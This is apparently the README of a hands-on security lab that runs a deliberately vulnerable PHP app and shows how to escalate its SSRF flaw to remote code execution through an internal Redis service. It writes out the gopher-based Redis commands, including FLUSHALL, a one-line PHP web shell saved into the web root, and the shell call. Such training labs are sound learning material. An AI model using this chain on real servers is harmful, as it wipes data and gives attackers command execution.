This lab simulates a vulnerable web application that allows Server-Side Request Forgery (SSRF). The goal is to escalate this into Remote Code Execution (RCE) by interacting with an internal Redis service.
- Apache + PHP (SSRF entry point)
- cURL-based URL fetcher
- Redis running locally (not exposed externally)
git clone https://github.com/Manlware/SSRF_Redis_RCE.git
cd SSRF_Redis_RCE
docker compose up -d --buildOpen:
http://localhost:8080
Exploit the SSRF vulnerability to:
- Reach the internal Redis service
- Write a malicious PHP file
- Execute commands via web shell
The application accepts a url parameter:
http://localhost:8080/?url=https://example.com
This is fetched server-side using curl without validation.
Redis is available at:
127.0.0.1:6379
Craft a payload to send raw Redis commands using Gopherus tool:
gopher://127.0.0.1:6379/...
Goal:
- Flush DB
- Write PHP payload
- Save to web root
Example logic:
FLUSHALL
SET 1 "<?php system($_GET['cmd']); ?>"
CONFIG SET dir /var/www/html
CONFIG SET dbfilename shell.php
SAVE
http://localhost:8080/shell.php?cmd=id
- Redis runs locally → not externally accessible
- Lab intentionally disables protections for learning
- This simulates real-world misconfigurations
This lab is for educational purposes only. Do not use these techniques on systems you do not own or have permission to test.